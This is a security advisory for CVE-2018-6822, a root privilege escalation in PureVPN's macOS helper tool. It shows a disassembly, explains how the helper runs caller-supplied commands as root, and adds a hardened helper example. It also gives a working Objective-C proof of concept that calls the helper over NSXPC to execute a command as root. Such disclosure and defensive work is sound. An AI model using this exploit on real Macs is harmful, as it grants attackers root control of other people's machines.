
[VS-2018-002] PureVPN for MacOS Root Privilege Escalation Vulnerability

Download: https://www.purevpn.com/download
CVE: CVE-2018-6822
Author: Benjamin Watson of VerSprite Security
Affected: < 6.0.1

Vulnerability Details

The protocol of PureVPN's com.purevpn.macapp.HelperTool NSXPC service defines the method __objc2_meth <offset sel_runWithCommand_withArguments_usingSudo_withReply_, ...> in its list of exported methods. It is the last entry in the disassembled method list of the protocol:

```text
__objc_const:0000000100014910 _OBJC_INSTANCE_METHODS_HelperToolProtocol __objc2_meth_list <18h, 1Bh>
__objc_const:0000000100014910                                         ; DATA XREF: __data:_OBJC_PROTOCOL_$_HelperToolProtocol↓o
__objc_const:0000000100014918                 __objc2_meth <offset sel_connectWithEndpointReply_, offset aV240816_0,\ ; "connectWithEndpointReply:" ...
__objc_const:0000000100014918                               0>
__objc_const:0000000100014930                 __objc2_meth <offset sel_getVersionWithReply_, offset aV240816_0, 0> ; "getVersionWithReply:" ...
__objc_const:0000000100014948                 __objc2_meth <offset sel_readLicenseKeyAuthorization_withReply_, \ ; "readLicenseKeyAuthorization:withReply:" ...
__objc_const:0000000100014948                               offset aV32081624, 0>
__objc_const:0000000100014960                 __objc2_meth <offset sel_writeLicenseKey_authorization_withReply_, \ ; "writeLicenseKey:authorization:withReply"... ...
__objc_const:0000000100014960                               offset aV4008162432, 0>
__objc_const:0000000100014978                 __objc2_meth <offset sel_bindToLowNumberPortAuthorization_withReply_, \ ; "bindToLowNumberPortAuthorization:withRe"... ...
__objc_const:0000000100014978                               offset aV32081624, 0>
__objc_const:0000000100014990                 __objc2_meth <offset sel_testFunctionAppsAuthorization_configObj_usingPreferencesRef_withReply_,\ ; "testFunctionAppsAuthorization:configObj"... ...
__objc_const:0000000100014990                               offset aV48081624Scpre, 0>
__objc_const:00000001000149A8                 __objc2_meth <offset sel_createServicesAuthorization_configObj_usingPreferencesRef_withReply_,\ ; "createServicesAuthorization:configObj:u"... ...
__objc_const:00000001000149A8                               offset aV48081624Scpre, 0>
__objc_const:00000001000149C0                 __objc2_meth <offset sel_createPasswordKeyChainItemAuthorization_lable_forService_withAccount_andPassword_withReply_,\ ; "createPasswordKeyChainItemAuthorization"... ...
__objc_const:00000001000149C0                               offset aV6408162432404, 0>
__objc_const:00000001000149D8                 __objc2_meth <offset sel_createSharedSecretKeyChainItemAuthorization_lable_forService_withPassword_withReply_,\ ; "createSharedSecretKeyChainItemAuthoriza"... ...
__objc_const:00000001000149D8                               offset aV5608162432404, 0>
__objc_const:00000001000149F0                 __objc2_meth <offset sel_createXAuthKeyChainItemAuthorization_lable_forService_withPassword_withReply_,\ ; "createXAuthKeyChainItemAuthorization:la"... ...
__objc_const:00000001000149F0                               offset aV5608162432404, 0>
__objc_const:0000000100014A08                 __objc2_meth <offset sel_executeVPNServiceConfigServer_withAccount_andPassword_andShareSecret_andType_HelperToolWithReply_,\ ; "executeVPNServiceConfigServer:withAccou"... ...
__objc_const:0000000100014A08                               offset aV640816243240q, 0>
__objc_const:0000000100014A20                 __objc2_meth <offset sel_setIpv6Leak_networkInterfaces_withReply_, \ ; "setIpv6Leak:networkInterfaces:withReply"... ...
__objc_const:0000000100014A20                               offset aV3608c162028, 0>
__objc_const:0000000100014A38                 __objc2_meth <offset sel_setRules_withReply_, offset aV32081624, 0> ; "setRules:withReply:" ...
__objc_const:0000000100014A50                 __objc2_meth <offset sel_removeAllRulesWithReply_, offset aV240816_0, \ ; "removeAllRulesWithReply:" ...
__objc_const:0000000100014A50                               0>
__objc_const:0000000100014A68                 __objc2_meth <offset sel_activateOnStartupWithReply_, \ ; "activateOnStartupWithReply:" ...
__objc_const:0000000100014A68                               offset aV240816_0, 0>
__objc_const:0000000100014A80                 __objc2_meth <offset sel_deactivateOnStartupWithReply_, \ ; "deactivateOnStartupWithReply:" ...
__objc_const:0000000100014A80                               offset aV240816_0, 0>
__objc_const:0000000100014A98                 __objc2_meth <offset sel_getVersionsWithReply_, offset aV240816_0, 0> ; "getVersionsWithReply:" ...
__objc_const:0000000100014AB0                 __objc2_meth <offset sel_executeTestFunctionInHelperToolWithReply_, \ ; "executeTestFunctionInHelperToolWithRepl"... ...
__objc_const:0000000100014AB0                               offset aV240816_0, 0>
__objc_const:0000000100014AC8                 __objc2_meth <offset sel_executePreferencesRefInHelperToolWithReply_, \ ; "executePreferencesRefInHelperToolWithRe"... ...
__objc_const:0000000100014AC8                               offset aV240816_0, 0>
__objc_const:0000000100014AE0                 __objc2_meth <offset sel_copySSTPFiles_, offset aV240816, 0> ; "copySSTPFiles:" ...
__objc_const:0000000100014AF8                 __objc2_meth <offset sel_copyIPSECFiles_, offset aV240816, 0> ; "copyIPSECFiles:" ...
__objc_const:0000000100014B10                 __objc2_meth <offset sel_connectSSTP_withAccount_andPassword_Executable_mtuInterfaceValue_withReply_,\ ; "connectSSTP:withAccount:andPassword:Exe"... ...
__objc_const:0000000100014B10                               offset aV6408162432404, 0>
__objc_const:0000000100014B28                 __objc2_meth <offset sel_executeSudo_WithReply_, offset aV32081624, 0> ; "executeSudo:WithReply:" ...
__objc_const:0000000100014B40                 __objc2_meth <offset sel_disconnectSSTP_, offset aV240816_0, 0> ; "disconnectSSTP:" ...
__objc_const:0000000100014B58                 __objc2_meth <offset sel_setMTUInterface_mtuValue_WithReply_, \ ; "setMTUInterface:mtuValue:WithReply:" ...
__objc_const:0000000100014B58                               offset aV4008162432, 0>
__objc_const:0000000100014B70                 __objc2_meth <offset sel_setSecureDNSWithServiceId_withDNS_WithReply_,\ ; "setSecureDNSWithServiceId:withDNS:WithR"... ...
__objc_const:0000000100014B70                               offset aV4008162432, 0>
__objc_const:0000000100014B88                 __objc2_meth <offset sel_runWithCommand_withArguments_usingSudo_withReply_,\ ; "runWithCommand:withArguments:usingSudo:"... ...
__objc_const:0000000100014B88                               offset aV44081624c3236, 0>
```

This method ends up calling -[HelperTool runCommand:withArguments:usingSudo:] with the arguments it received from the NSXPC client, which in turn calls -[HelperTool runCommand:withArguments:], again with the caller-supplied arguments. Because the HelperTool runs with root privileges once the user has installed it, it executes whatever command the NSXPC client sends, via NSTask, as:

/usr/bin/sudo <command> <args>
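The defensive counterpart to the behaviour above, as an added example that is not PureVPN's code: a listener delegate that checks the connecting client's code signature before exposing the protocol, and a command method that refuses anything outside a fixed allowlist. The HardenedHelper class, the requirement string (com.example.vpnclient, EXAMPLETEAMID) and the allowlisted paths are assumptions; only the protocol name comes from the page.

```objc
#import <Foundation/Foundation.h>
#import <Security/Security.h>

// Hypothetical hardened helper (example code, not PureVPN's). The protocol
// name is the page's; class name, requirement string and allowlist are assumed.
@protocol HelperToolProtocol
- (void)runWithCommand:(NSString *)command withArguments:(NSArray<NSString *> *)args
             usingSudo:(BOOL)usingSudo withReply:(void (^)(BOOL))reply;
@end
@interface HardenedHelper : NSObject <HelperToolProtocol, NSXPCListenerDelegate>
@end
@implementation HardenedHelper
// 1. Authenticate the caller: accept a connection only from a process whose code
//    signature satisfies a fixed requirement (placeholder bundle ID and Team ID).
//    The pid lookup is the public API; pids can be recycled, so production code
//    should anchor the check on the connection's audit token where available.
- (BOOL)listener:(NSXPCListener *)listener shouldAcceptNewConnection:(NSXPCConnection *)conn {
    NSDictionary *attrs = @{ (__bridge id)kSecGuestAttributePid : @(conn.processIdentifier) };
    SecCodeRef client = NULL;
    SecRequirementRef req = NULL;
    if (SecCodeCopyGuestWithAttributes(NULL, (__bridge CFDictionaryRef)attrs,
                                       kSecCSDefaultFlags, &client) != errSecSuccess) return NO;
    if (SecRequirementCreateWithString(
            CFSTR("anchor apple generic and identifier \"com.example.vpnclient\" "
                  "and certificate leaf[subject.OU] = \"EXAMPLETEAMID\""),
            kSecCSDefaultFlags, &req) != errSecSuccess) { CFRelease(client); return NO; }
    OSStatus status = SecCodeCheckValidity(client, kSecCSDefaultFlags, req);
    CFRelease(req); CFRelease(client);
    if (status != errSecSuccess) return NO;
    conn.exportedInterface = [NSXPCInterface interfaceWithProtocol:@protocol(HelperToolProtocol)];
    conn.exportedObject = self;
    [conn resume];
    return YES;
}
// 2. Never launch a caller-chosen binary: only fixed absolute paths the helper is
//    meant to run are accepted, and usingSudo is ignored because the helper is
//    already root. Arguments still need per-command validation (omitted here).
- (void)runWithCommand:(NSString *)command withArguments:(NSArray<NSString *> *)args
             usingSudo:(BOOL)usingSudo withReply:(void (^)(BOOL))reply {
    NSSet<NSString *> *allowed = [NSSet setWithArray:@[ @"/sbin/ifconfig", @"/usr/sbin/networksetup" ]];
    if (![allowed containsObject:command]) { reply(NO); return; }
    NSTask *task = [[NSTask alloc] init];
    task.launchPath = command;          // path taken from the allowlist, not trusted as-is
    task.arguments = args ?: @[];
    [task launch];
    [task waitUntilExit];
    reply(task.terminationStatus == 0);
}
@end
```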

Exploitation

PoC

```objc
#import <Foundation/Foundation.h>

// Client-side declaration of the helper's protocol, matching the exported selector.
@protocol HelperToolProtocol
-(void)runWithCommand:(id)command withArguments:(NSArray*)withArguments usingSudo:(char)usingSudo withReply:(void(^)(char))withReply;
@end

// Connect to the privileged helper's Mach service.
NSXPCConnection *connection = [[NSXPCConnection alloc] initWithMachServiceName:@"com.purevpn.macapp.HelperTool" options:NSXPCConnectionPrivileged];
connection.remoteObjectInterface = [NSXPCInterface interfaceWithProtocol:@protocol(HelperToolProtocol)];
NSLog(@"[+] NSXPCConnection established -> %@ [!]", connection);
connection.interruptionHandler = ^{
    NSLog(@"Connection Terminated");
};
connection.invalidationHandler = ^{
    NSLog(@"Connection Invalidated");
};
[connection resume];
// Ask the helper to run "id"; the helper executes it as root via /usr/bin/sudo.
NSArray* args = [NSArray arrayWithObjects: @"", @"", nil];
[[connection remoteObjectProxy] runWithCommand:@"id" withArguments:args usingSudo:(char)1 withReply:^(char c) {
    // c is the status byte returned by the helper; nothing else comes back
}];
```

The resulting sudo entry in the system log shows the command executed as root:

```text
Feb  9 07:24:52 users-Mac sudo[1083] <Notice>:     root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/usr/bin/id
```